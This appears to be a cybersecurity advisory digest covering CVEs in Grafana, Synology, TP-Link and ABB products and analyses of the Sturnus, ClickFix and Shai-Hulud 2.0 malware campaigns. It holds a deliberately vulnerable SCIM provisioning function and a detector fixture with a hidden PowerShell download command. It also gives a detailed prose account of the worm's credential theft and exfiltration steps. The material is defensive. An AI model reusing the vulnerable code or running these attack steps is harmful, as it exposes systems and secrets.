• ABB Ability Edgenius 3.2.0.0
• ABB Ability Edgenius 3.2.1.1
Fixed Version
• ABB Ability Edgenius 3.2.2.0 or later
Recommended Actions
• Update all affected Edgenius deployments to version 3.2.2.0 or later
• Restrict network access to Edgenius Management Portal interfaces
• Implement network segmentation to isolate edge management systems
• Monitor logs for suspicious unauthenticated access attempts
• Ensure strong authentication and least-privilege access controls are applied
- Critical Vulnerability in Grafana Enterprise
A critical privilege-escalation vulnerability has been identified in the SCIM provisioning feature of Grafana Enterprise. The flaw allows a malicious or compromised SCIM client to manipulate user identity fields, enabling unauthorized escalation to administrative privileges, including impersonation of the Admin user.
Vulnerability Details
• CVE-2025-41115
• Severity: Critical (CVSS 10.0)
• The vulnerability results from how Grafana Enterprise mapped the SCIM externalId onto its internal user identity: a numeric externalId supplied by the SCIM client could be resolved to an existing internal user ID, including that of the built-in Admin user.
• A compromised or malicious SCIM client can alter identity attributes during provisioning, allowing:
– Full privilege escalation
– Administrative account impersonation
– Unauthorized access to dashboards, data sources, and integrations
– Complete compromise of the Grafana Enterprise environment
Affected Versions
• Grafana Enterprise 12.0.0 through 12.2.1, only where SCIM provisioning has been enabled (feature flag plus user sync); Grafana OSS does not ship SCIM and is not affected
Fixed Versions
• Grafana Enterprise 12.3.0
• Grafana Enterprise 12.2.1+security-01
• Grafana Enterprise 12.1.3+security-01
• Grafana Enterprise 12.0.6+security-01
(The plain 12.2.1, 12.1.3 and 12.0.6 releases are affected; the fix is in the +security-01 builds.)
Recommended Actions
• Immediately update all affected Grafana Enterprise instances to a fixed version
• Audit SCIM client configurations and remove unauthorized provisioning clients
• Review Grafana user logs for suspicious identity changes or privilege escalation attempts
• Apply network restrictions to limit which systems can interact with the SCIM API
• Enforce least-privilege access for identity provisioning systems
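The mapping fault behind this issue, modelled as an added example (not Grafana code): the vulnerable provisioning path treats a numeric SCIM externalId as the internal user ID, so a SCIM client that sends externalId "1" lands on the built-in Admin account, while the hardened path treats externalId as an opaque attribute that can only match a user previously created through SCIM and refuses to claim a login that already exists outside SCIM. The mechanism modelled (a numeric externalId resolved to an internal user ID) follows the public description of the vulnerability; the classes, function names and in-memory store are invented for the illustration.

```python
"""Vulnerable vs hardened handling of the SCIM externalId during user
provisioning. Added example, not Grafana code; names and store are invented.
Models the reported mechanism: a numeric externalId accepted as the internal
user ID lets a SCIM client reuse an existing account such as admin (ID 1)."""
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class User:
    id: int
    login: str
    is_admin: bool = False
    external_id: Optional[str] = None   # set only for SCIM-provisioned users


@dataclass
class UserStore:
    users: dict = field(default_factory=dict)   # internal id -> User
    next_id: int = 2                            # 1 is reserved for admin

    def add(self, login, is_admin=False, external_id=None):
        u = User(self.next_id, login, is_admin, external_id)
        self.users[u.id] = u
        self.next_id += 1
        return u


def bootstrap():
    """Fresh store with the built-in admin (ID 1), created outside SCIM."""
    store = UserStore()
    store.users[1] = User(1, "admin", is_admin=True)
    return store


def provision_vulnerable(store, scim_user):
    """Vulnerable: a numeric externalId is looked up as the internal user ID,
    so {"externalId": "1"} resolves to admin and the SCIM update is applied
    to that account (login rewritten, admin flag kept)."""
    ext = scim_user.get("externalId", "")
    if ext.isdigit() and int(ext) in store.users:
        user = store.users[int(ext)]
        user.login = scim_user["userName"]
        user.external_id = ext
        return user
    return store.add(scim_user["userName"], external_id=ext)


def provision_hardened(store, scim_user):
    """Hardened: externalId is opaque and only ever matches a user that was
    itself provisioned with that externalId; it is never a database ID.
    Accounts created outside SCIM (admin) cannot be claimed, and SCIM never
    grants the admin flag."""
    ext = scim_user.get("externalId")
    if not ext:
        raise ValueError("externalId required")
    for user in store.users.values():
        if user.external_id == ext:
            user.login = scim_user["userName"]
            return user
    if any(u.login == scim_user["userName"] for u in store.users.values()):
        raise ValueError("login already exists and is not SCIM-managed")
    return store.add(scim_user["userName"], is_admin=False, external_id=ext)


if __name__ == "__main__":
    payload = {"userName": "attacker", "externalId": "1"}   # constructed
    v = provision_vulnerable(bootstrap(), payload)
    print("vulnerable ->", v)            # id=1, is_admin=True, login=attacker
    h = provision_hardened(bootstrap(), payload)
    print("hardened   ->", h)            # id=2, is_admin=False
```

The same shape applies when reviewing any provisioning integration: identifiers supplied by the identity provider must be stored and compared as opaque strings, never cast into the application's own primary keys.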
- Denial-of-Service (DoS) Vulnerability in TP-Link Routers
A high-severity Denial-of-Service (DoS) vulnerability has been discovered in the TP-Link TL-WR940N V6 router. The flaw affects all firmware versions up to Build 220801 and resides in the router’s UPnP module, where improper input validation allows adjacent-network attackers to crash the UPnP service and disrupt network functionality.
Vulnerability Details
• CVE-2025-11676
• CVSS v4.0: 7.1 (High)
• The vulnerability stems from improper input validation within the UPnP module.
• An unauthenticated attacker on the adjacent network can send malicious UPnP packets that trigger a crash of the UPnP service.
• Impact:
– UPnP service becomes unavailable
– Automatic port forwarding and other dependent functions fail
– Local network instability or degraded performance
Affected & Fixed Versions
• Product Model: TL-WR940N V6
• Affected Version: ≤ Build 220801
• Fixed Versions: Build 250919, Build 250925
Recommended Actions
• Update TL-WR940N V6 to the latest available patched firmware
• Disable UPnP if it is not required for operational needs
• Restrict access to local network segments to reduce exposure
• Monitor router logs for repeated UPnP crashes or malformed traffic
References
https://www.tp-link.com/us/support/faq/4755/
- High-Severity Vulnerability in Synology DSM
A high-severity authentication bypass vulnerability has been identified in Synology DiskStation Manager (DSM). The flaw allows remote attackers to bypass authentication controls if they possess prior knowledge of a valid distinguished name (DN), potentially enabling unauthorized access to affected NAS systems.
Vulnerability Details
• CVE-2025-13392
• CVSS v3 Base Score: 8.1 (High)
• The vulnerability allows an attacker with knowledge of a valid DN to bypass authentication in specific DSM versions.
• Impact:
– Unauthorized remote access
– Potential compromise of NAS data and system integrity
– Access to shared resources, backups, and administrative settings
Affected Products & Fixed Versions
• DSM 7.3: Update to 7.3.1-86003-1 or later
• DSM 7.2.2: Update to 7.2.2-72806-5 or later
Recommended Actions
• Immediately update to the latest DSM security release
• Review authentication logs for unusual or repeated DN-based login attempts
• Enforce strong DN secrecy and restrict LDAP/Directory exposure
• Implement network segmentation to limit access to DSM management interfaces
• Enable two-factor authentication (2FA) for DSM accounts
References
https://www.synology.com/en-my/security/advisory/Synology_SA_25_14
- Sturnus Android Banking Trojan Captures Encrypted Chats and Enables Full Device Takeover
A newly discovered Android banking trojan named Sturnus has been identified with advanced capabilities enabling credential theft, financial fraud, encrypted chat capture, and full remote control of infected devices. The malware is currently assessed to be in an evaluation phase and is privately operated, targeting financial institutions across Southern and Central Europe.
Key Technical Details
• Sturnus can bypass encrypted messaging by capturing decrypted content directly from the device screen, enabling surveillance of WhatsApp, Telegram, and Signal.
• The trojan performs overlay attacks, displaying fake login screens over banking apps to harvest credentials.
• Distributed via malicious apps including:
– Google Chrome (fake variant: com.klivkfbky.izaybebnx)
– Preemix Box (com.uvxuthoq.noscjahae)
• Uses a mixed communication pattern (plaintext, AES, RSA), inspiring its name “Sturnus” after the vocal-mimicking starling bird.
• Establishes WebSocket + HTTP channels to register compromised devices and receive task payloads.
• Opens a persistent WebSocket channel enabling remote control via VNC-like sessions.
Capabilities & Behavior
• Abuses Android Accessibility Services to:
– Capture keystrokes
– Monitor UI interactions
– Read chat content from Signal, Telegram, WhatsApp
– Record all visible interface elements
• After harvesting credentials from a targeted bank, the corresponding overlay is disabled to avoid suspicion.
• Supports full-screen fake OS update overlays, blocking user visibility while malicious activity runs in the background.
• Enables remote interaction with the infected device:
– Text input
– Clicks & gestures
– Scrolling
– Permission dialogs
– App launches
– Black-screen overlays
• Includes a real-time screen mirroring mechanism using Android’s display-capture framework.
• Prevents removal by:
– Detecting attempts to disable admin rights
– Automatically navigating away from settings screens
– Blocking uninstall & ADB removal until admin rights are revoked
Additional Features
• Extensive environment monitoring:
– Sensor data
– Hardware and network info
– Installed apps inventory
• Enables attackers to dynamically adjust tactics to evade detection.
• Current spread remains limited but indicates preparation for large-scale, coordinated financial attacks.
Google Statement
Google confirmed that Google Play Protect detects and blocks known versions of Sturnus.
Reference
https://thehackernews.com/2025/11/new-sturnus-android-trojan-quietly.html
- TamperedChef Malware Campaign Abuses Signed Applications for Stealth and Persistence
A new malware campaign tracked as TamperedChef has been identified abusing legitimately signed applications, malvertising, and fraudulent download portals to deliver modular malware capable of credential theft, persistence, and long-term system compromise. The campaign relies heavily on social engineering and code-signing trust models to evade security controls.
Key Technical Details
• Threat actors use code-signing certificates obtained through U.S.-registered shell companies, allowing their malicious apps to appear trustworthy.
• Malware is distributed via:
– Search engine manipulation
– Malvertising
– Fraudulent but legitimate-looking download sites
– Fake “manual readers,” PDF utilities, and system tools
• All malicious apps are fully functional and digitally signed, helping them bypass endpoint protection and user suspicion.
Infection Distribution
• ~80% of infections detected in the United States
• Remaining spread globally
• High infection rates observed in healthcare, manufacturing, and construction, where employees frequently download manuals and tools.
• Lures are not localized — most are English-based but affect worldwide users due to search-driven distribution.
Capabilities & Behavior
• Malware deploys modular payloads enabling:
– Credential theft
– Downloading additional components
– Machine ID generation via registry queries
• Establishes persistence via:
– Scheduled tasks using XML, not classic autorun or registry methods
– Obfuscated JavaScript executed on a recurring schedule, resisting removal
• Signed binaries imitate true installer behavior, increasing trust and bypassing enterprise software policies.
Delivery & Infrastructure
• Initial access delivered not via phishing, but through:
– Hijacked search results
– Paid advertisements
• Payloads communicate over encrypted channels with attacker-controlled servers using:
– Rapid domain rotation
– Commodity hosting providers like Namecheap
• Infrastructure supports dynamic payload updates and data exfiltration.
Threat Impact
• Facilitates long-term access and potential resale of compromised systems
• Provides a platform for:
– Credential harvesting
– Deployment of secondary malware
– Ransomware staging
• Campaign leverages certificate rotation to maintain trust and evade revocation or detection.
Analyst Note
• Detection varies by region based on certificate validation rules, endpoint security maturity, and software supply-chain controls.
• Organizations with weak download policies or decentralized software acquisition are at high risk.
Reference
https://www.bankinfosecurity.asia/tamperedchef-exploits-signed-apps-for-stealth-a-30089
- “Sneaky 2FA” Browser-in-the-Browser Attacks Use Fake Login Windows to Steal Credentials
A new Phishing-as-a-Service (PhaaS) kit called Sneaky 2FA enables attackers to deploy highly convincing Browser-in-the-Browser (BitB) phishing attacks that mimic real authentication pop-ups. These fake windows can steal usernames and passwords by visually imitating legitimate login prompts, including realistic address bars, window frames, and trusted brand layouts.
Key Technical Details
• Sneaky 2FA is an obfuscated, licensed phishing toolkit sold on underground markets.
• Attackers create fake browser pop-up windows entirely in HTML + CSS, rendering:
– Fake address bar with a spoofed legitimate URL
– Realistic browser frame
– Authentic-looking login forms
• Victims believe they’re logging in to trusted services, but credentials are sent directly to the attacker.
• Password managers can detect these attacks by refusing to autofill credentials on HTML-based fake windows.
Capabilities & Evasion Techniques
• Toolkit blocks security tools and automated crawlers by redirecting them to benign content.
• BitB pop-up dynamically adapts to:
– User’s operating system
– Browser appearance (Chrome, Firefox, Edge)
• Attackers use short-lived domains that rotate rapidly to evade blocklists (“burn and replace”).
• High-value targets only see the phishing interface, while low-value visits are redirected elsewhere.
Threat Impact
• Enables credential theft even when victims visually verify the URL bar.
• Bypasses common phishing awareness tips (e.g., “check the URL”).
• Allows seamless stealing of usernames, passwords, and MFA-related data due to realistic interface mimicry.
User Safety Considerations
• A password manager is the strongest defense — it autofills credentials only on real login forms, not HTML imitations.
• Pairing MFA with password managers significantly reduces risk.
• Users should avoid clicking unsolicited links and verify messages before engaging.
Additional Defense Layer
• Malwarebytes Browser Guard can detect and block BitB-style attacks using heuristic analysis.
- EVALUSION ClickFix Campaign Delivers Amatera Stealer and NetSupport RAT
A newly observed malware campaign, tracked as EVALUSION, is leveraging ClickFix social engineering techniques to deliver Amatera Stealer and NetSupport RAT. The activity was detected in November 2025 and showcases increasingly deceptive user-triggered infection chains involving command execution through the Windows Run dialog.
Key Technical Details
• The campaign uses ClickFix, a social engineering tactic where victims are tricked into pasting malicious commands into the Windows Run dialog under the guise of completing a CAPTCHA.
• Executing the command launches mshta.exe, which runs a malicious PowerShell script that downloads a .NET payload from MediaFire.
• This payload is a PureCrypter-packed Amatera Stealer DLL, injected into the MSBuild.exe process for stealthy execution.
• After data theft, Amatera fetches and runs NetSupport RAT, but only if the victim is deemed high-value (domain-joined or crypto-wallet detected).
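To make the infection chain above concrete from the detection side, here is an added example (not part of the original report) that walks constructed process-creation events and reports the Run dialog → mshta.exe → PowerShell → MSBuild.exe sequence. The event field names, the sample events, and the assumption that explorer.exe is the parent of a command typed into the Run dialog are this example's own.

```javascript
// Added example (not from the original report): flags the ClickFix process
// chain described above over constructed process-creation events.
// Assumed event shape: { pid, ppid, image, cmdline }, as a Sysmon/EDR export
// would provide. The assumption that explorer.exe is the parent of a command
// typed into the Run dialog is this example's own.

const base = (p) => p.split(/[\\/]/).pop().toLowerCase();

// Per-process stage rules tied to the campaign: Run-dialog launch of mshta.exe,
// mshta.exe spawning PowerShell that fetches from MediaFire, and PowerShell
// starting MSBuild.exe as the injection host.
function classify(ev, parent) {
  const img = base(ev.image);
  const pimg = parent ? base(parent.image) : '';
  const cmd = (ev.cmdline || '').toLowerCase();
  if (img === 'mshta.exe' && pimg === 'explorer.exe') return 'run-dialog-mshta';
  if (img === 'powershell.exe' && pimg === 'mshta.exe')
    return cmd.includes('mediafire') ? 'mshta-powershell-mediafire' : 'mshta-powershell';
  if (img === 'msbuild.exe' && pimg === 'powershell.exe') return 'powershell-msbuild-host';
  return null;
}

// Starts from every MSBuild.exe process and walks the parent chain upward;
// reports only the full three-stage chain that begins at the Run dialog.
function detectClickFixChains(events) {
  const byPid = new Map(events.map((e) => [e.pid, e]));
  const findings = [];
  for (const ev of events) {
    if (base(ev.image) !== 'msbuild.exe') continue;
    const stages = [];
    let cur = ev;
    while (cur) {
      const tag = classify(cur, byPid.get(cur.ppid));
      if (!tag) break;
      stages.unshift(tag);
      cur = byPid.get(cur.ppid);
    }
    if (stages.length === 3 && stages[0] === 'run-dialog-mshta') {
      findings.push({ pid: ev.pid, stages });
    }
  }
  return findings;
}

// Constructed sample: one ClickFix chain plus a benign IDE-driven MSBuild run.
const SAMPLE_EVENTS = [
  { pid: 100, ppid: 1, image: 'C:\\Windows\\explorer.exe', cmdline: 'explorer.exe' },
  { pid: 200, ppid: 100, image: 'C:\\Windows\\System32\\mshta.exe', cmdline: 'mshta.exe https://captcha.example/verify' },
  { pid: 300, ppid: 200, image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    cmdline: 'powershell.exe -w hidden -c "iwr https://www.mediafire.com/<placeholder>"' },
  { pid: 400, ppid: 300, image: 'C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe', cmdline: 'MSBuild.exe' },
  { pid: 500, ppid: 1, image: 'C:\\Program Files\\Microsoft Visual Studio\\devenv.exe', cmdline: 'devenv.exe' },
  { pid: 600, ppid: 500, image: 'C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe', cmdline: 'MSBuild.exe app.csproj' },
];

console.log(JSON.stringify(detectClickFixChains(SAMPLE_EVENTS), null, 2));
```

The benign devenv.exe → MSBuild.exe pair is deliberately included so the rule fires only on the full chain, not on every MSBuild launch.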
Amatera Stealer Details
• Successor to ACR (“AcridRain”) Stealer, previously sold via MaaS.
• Subscription pricing ranges from $199/month to $1,499/year.
• Supports extensive data exfiltration from:
– Crypto-wallets
– Browsers
– Messaging applications
– FTP clients
– Email services
• Uses WoW64 SysCalls to bypass user-mode hooking in EDR, AV, and sandboxes.
NetSupport RAT Deployment Logic
• Triggered only when Amatera detects:
– The system is part of a domain
– Valuable files (e.g., crypto wallets) are present
• This selective deployment optimizes threat actor resources and minimizes detection.
Related Observed Campaigns
Multiple phishing operations are concurrently distributing malware including XWorm, NetSupport RAT, and credential stealers:
• XWorm Distribution
– Via email with VBS attachments posing as invoices
– Batch→PowerShell loader chain used to deliver payload
• SmartApeSG / HANEYMANEY / ZPHP Campaign
– Compromised websites injected with JavaScript
– Redirect victims to fake Cloudflare Turnstile ClickFix prompts
– Deliver NetSupport RAT
• Fake Booking.com pages
– Display misleading CAPTCHA checks
– Use ClickFix lures to execute credential-stealing PowerShell commands
• Spoofed internal email alerts
– Claim blocked invoices, packages, or RFQs
– Trick victims into entering credentials on phishing portals
• Cephas phishing kit
– Notable for obfuscation using invisible random characters
– Evades YARA signatures and anti-phishing scanners
• Tycoon 2FA phishing kit
– Leads users to realistic malicious login pages
– Designed for MFA-bypass and credential harvesting
Threat Impact
• Highly successful social engineering through fake reCAPTCHA/ClickFix prompts
• Multi-stage, stealthy payload delivery
• Deployment of two powerful tools:
– Amatera Stealer (high-value data collection)
– NetSupport RAT (full remote control)
• Strong evasion characteristics: PureCrypter, SysCalls, code obfuscation, selective payloading
• Growing overlap with phishing, RATs, credential theft, and malware-as-a-service ecosystems
Reference
https://thehackernews.com/2025/11/new-evalusion-clickfix-campaign.html
- Shai-Hulud 2.0 Campaign Targets Cloud and Developer Ecosystems
Shai-Hulud 2.0 is a highly advanced supply-chain malware campaign that targets developers and CI/CD environments by abusing npm packages, Bun runtime, GitHub Actions, and multi-cloud secret managers. It steals credentials and secrets from AWS, GCP, Azure, npm, and GitHub, then automatically backdoors all npm packages maintained by the victim, republishing them with malicious preinstall hooks. This creates a wormable, large-scale supply chain threat with the potential to impact thousands of downstream users.
Initial Access and Loader (setup_bun.js)
• Delivered as a malicious npm package with "preinstall": "node setup_bun.js" in package.json.
• setup_bun.js runs automatically during npm install and:
– Checks for the Bun runtime using where (Windows) or which (Linux/macOS).
– If missing, silently installs Bun using the official bun.sh install scripts (PowerShell or curl | bash), mimicking legitimate behavior.
– Reloads PATH (Windows via registry and PowerShell, Unix via sourcing .bashrc, .zshrc, etc.) so Bun is visible.
– Locates Bun (global or locally bundled) and executes the main payload: bun bun_environment.js.
Execution Logic (bun_environment.js / jy1)
• jy1() is the main entry point and decides behavior based on the environment:
– CI/CD mode: if variables like GITHUB_ACTIONS, CODEBUILD_BUILD_NUMBER, CIRCLE_SHA1, BUILDKITE, PROJECT_ID are present → run inline to harvest as many credentials as possible from build pipelines.
– Developer workstation mode: spawns a detached background process (Bun.spawn().unref() with POSTINSTALL_BG=1), letting npm install finish quickly (2–3 seconds) while the child process quietly continues credential theft.
• Persistence / privilege & security control handling on Linux via:
– cQ0(): checks if /home/agent/agent is already running.
– pQ0(): attempts privilege escalation (passwordless sudo or abusing Docker privileged containers to modify sudoers).
– gQ0(): disables security controls by tampering with the systemd-resolved config and flushing iptables (OUTPUT, DOCKER-USER) to remove network filtering.
Credential Theft: npm, GitHub, and Multi-Cloud Environments (aL0)
• npm tokens:
– Reads .npmrc in the current directory and the user home.
– Extracts _authToken entries via regex and validates them using /-/whoami to confirm the token and fetch the npm username.
– Validated tokens and usernames are later used for package enumeration and republishing.
• GitHub credentials: uses stolen GitHub tokens for:
– Repository creation (for C2).
– Workflow manipulation and secrets theft.
– Installing self-hosted GitHub Actions runners on victim systems.
• AWS credential harvesting:
– Uses the standard AWS SDK credential chain to collect AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, session tokens, account IDs, expiration, and metadata.
– Reads ~/.aws/config and ~/.aws/credentials (or the paths from AWS_CONFIG_FILE / AWS_SHARED_CREDENTIALS_FILE).
– Targets container credentials (ECS/EKS task creds via metadata endpoints), enabling lateral movement in cloud environments.
• GCP credential harvesting:
– Looks for GOOGLE_APPLICATION_CREDENTIALS and loads service account JSON keys.
– Locates the gcloud SDK config (via CLOUDSDK_CONFIG, %APPDATA%\gcloud, ~/.config/gcloud) and extracts cached auth tokens.
– Checks for ADC JSON (Application Default Credentials) and reads tokens and keys if present.
• Azure credential harvesting: scans multiple Azure-related environment variables to support:
– Service Principal + client secret (tenant, client ID, client secret).
– Certificate-based auth (AZURE_CLIENT_CERTIFICATE_PATH, optional password).
– Username/password auth (legacy).
– Workload Identity (Kubernetes, via AZURE_TENANT_ID, AZURE_CLIENT_ID, AZURE_FEDERATED_TOKEN_FILE).
– Azure Pod Identity (via AZURE_POD_IDENTITY_AUTHORITY_HOST and IMDS-based token retrieval).
Active Secret Manager Abuse (AWS, GCP, Azure)
Goes beyond static keys to live secret stores:
• AWS Secrets Manager: validates creds via STS GetCallerIdentity, then iterates 17 AWS regions, calling ListSecrets and GetSecretValue.
• GCP Secret Manager:
– Validates access via getAccessToken().
– Lists projects via the Resource Manager API.
– For each project, enumerates secrets and fetches {secretName}/versions/latest.
• Azure Key Vault:
– Authenticates using DefaultAzureCredential.
– Enumerates Microsoft.KeyVault/vaults via Azure Resource Manager.
– Iterates and reads all secrets from each vault.
TruffleHog Integration for File-System Secret Discovery
• Automatically downloads the latest TruffleHog release from GitHub at runtime (no hard-coded version).
• Caches the binary; if not cached, fetches and extracts it, then marks it executable.
• Runs TruffleHog against the user’s home directory with JSON output and a 10-minute timeout.
• Aggregates:
– Discovered secrets
– Errors
– Scan duration and exit code
• Stores the results as a structured report for exfiltration.
GitHub-based Command-and-Control (C2) and Secret Exfiltration
• Per-victim C2 repository creation:
– Uses the stolen GitHub token with Octokit repos.createForAuthenticatedUser() to create a public repo named with an 18-character random string and the description “Shai-Hulud: The Second Coming.”
– Saves owner/repo as this.gitRepo for later C2 and exfil.
• Self-hosted GitHub Actions runner deployment:
– Checks if the token has the workflow scope (via x-oauth-scopes).
– Requests a runner registration token using /repos/{owner}/{repo}/actions/runners/registration-token.
– Downloads the appropriate GitHub runner for Linux/Windows/macOS and installs it into a hidden directory ($HOME/.dev-env or similar).
– Registers the runner as “SHA1HULUD” and runs it in the background (nohup or hidden PowerShell), providing persistent remote execution.
• C2 via GitHub Discussions:
– Creates a workflow .github/workflows/discussion.yaml that triggers on discussion events.
– Allows attackers to execute commands on the infected machine simply by posting messages in GitHub Discussions in the C2 repo.
• Malicious workflow for secrets exfiltration: injects a second workflow into all accessible repositories:
– Creates a temporary branch like add-linter-workflow-{timestamp} to look benign.
– Adds a workflow named “Code Formatter” that triggers on push.
– Uses toJSON(secrets) to serialize all GitHub repository secrets (cloud keys, API tokens, DB passwords, signing keys).
– Uploads the secrets as an artifact named formatting.
• Monitors the GitHub Actions API for workflow runs:
– Polls every 2 seconds, up to 30 seconds, for completion.
– Once completed, enumerates artifacts, retrieves the pre-signed artifact URL, downloads the ZIP, and extracts format.json containing the stolen secrets.
Data Aggregation and Exfiltration via GitHub Repo
Aggregates four main JSON files and pushes them to the attacker-controlled GitHub repo:
• contents.json – system metadata (OS, hostname, user, GitHub auth status).
• environment.json – full environment dump (including many credentials and configuration secrets).
• cloud.json – contents pulled from AWS Secrets Manager, GCP Secret Manager, and Azure Key Vault.
• truffleSecrets.json – TruffleHog scan results (hardcoded secrets in code/config).
Supply-Chain Propagation via npm (Highly Wormable)
• Uses the validated npm token and username to enumerate victim-maintained packages via the npm search API (/-/v1/search?maintainer=…) for up to 100 packages, sorted by monthly downloads to prioritize high-impact packages.
• For each package:
– Downloads the original tarball from npm.
– Extracts it to a temp directory named like NPM-update-… (to resemble legitimate tooling).
– Modifies package.json to add or overwrite "preinstall": "node setup_bun.js".
– Injects setup_bun.js and bun_environment.js into the package.
– Repackages and publishes a new version using the victim’s npm auth token, typically with a minor patch bump (looks like a normal bugfix release).
• Result: any downstream user running npm install on these packages gets infected, driving exponential spread across the npm ecosystem.
Destructive Failsafe
If the malware fails to obtain both a valid npm token and a valid GitHub token, it may execute destructive commands attempting to delete all files in the user’s home directory, acting as a failsafe / anti-analysis mechanism.
Defensive Notes (High-Level)
Monitor for:
• Unexpected Bun installations triggered during npm install.
• preinstall hooks added/changed in package.json unexpectedly.
• Suspicious creation of GitHub repos with descriptions like “Shai-Hulud: The Second Coming.”
• Unusual self-hosted GitHub Actions runners named SHA1HULUD.
• New workflows such as discussion.yaml and “Code Formatter” that serialize secrets and upload artifacts named formatting.
For detection/hunting (from Trend Micro guidance), a sample pattern:
malName:*SHULUD* AND eventName:MALWARE_DETECTION AND LogType:detection